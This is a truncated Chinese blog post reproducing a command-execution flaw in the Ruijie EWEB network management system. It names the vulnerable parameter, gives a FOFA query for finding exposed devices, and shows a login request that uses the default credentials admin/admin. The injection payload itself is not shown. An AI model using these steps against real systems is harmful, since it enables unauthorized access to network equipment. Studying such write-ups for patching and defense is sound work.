锐捷EWEB网管系统 RCE漏洞复现

  • 开发
  • 51

0x01 产品简介

  锐捷网管系统是由北京锐捷数据时代科技有限公司开发的新一代基于云的网络管理软件,以“数据时代创新网管与信息安全”为口号,定位于终端安全、IT运营及企业服务化管理统一解决方案。

0x02 漏洞概述

  Ruijie-EWEB 网管系统 flwo.control.php 中的 type 参数存在命令执行漏洞,攻击者可利用该漏洞执行任意命令,写入后门,获取服务器权限,进而控制整个web服务器。

0x03 复现环境

FOFA:app="Ruijie-EWEB网管系统"

127d55f3543a4249a89139605fe5dabb.png

0x04 漏洞复现 

获取admin用户有效cookie

POST /ddi/server/login.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

username=admin&password=admin?

阅读全部

相关推荐

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2023-12-06 19:46:04       94 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2023-12-06 19:46:04       100 阅读

  9. 在Django里面运行非项目文件

    2023-12-06 19:46:04       82 阅读

  19. Python语言-面向对象

    2023-12-06 19:46:04       91 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2023-12-06 19:46:04       85 阅读

热门阅读

  1. 0X04

    0X04

    2023-12-06 19:46:04      43 阅读

  4. 【论文阅读】-使用小波变换进行数字图像模糊检测

    2023-12-06 19:46:04       64 阅读

  8. Springboot resource 下的excel

    2023-12-06 19:46:04       58 阅读

  11. LLM微调(二)| 微调LLAMA-2和其他开源LLM的两种简单方法

    2023-12-06 19:46:04       47 阅读

  13. OpenCV 使用方形棋盘进行相机校准

    2023-12-06 19:46:04       47 阅读

  15. MySQL海量数据配置优化教程

    2023-12-06 19:46:04       51 阅读

  16. Django rest froamwork-ModelSerializer

    2023-12-06 19:46:04       53 阅读

  19. 求助-爬取天眼查上包含特定关键字的 所有的公司的名称对应的联系方式

    2023-12-06 19:46:04       57 阅读

  20. Python一帮一

    2023-12-06 19:46:04       50 阅读

  23. promise使用示例

    2023-12-06 19:46:04       49 阅读

  30. Jira中重要的目录和文件

    2023-12-06 19:46:04       44 阅读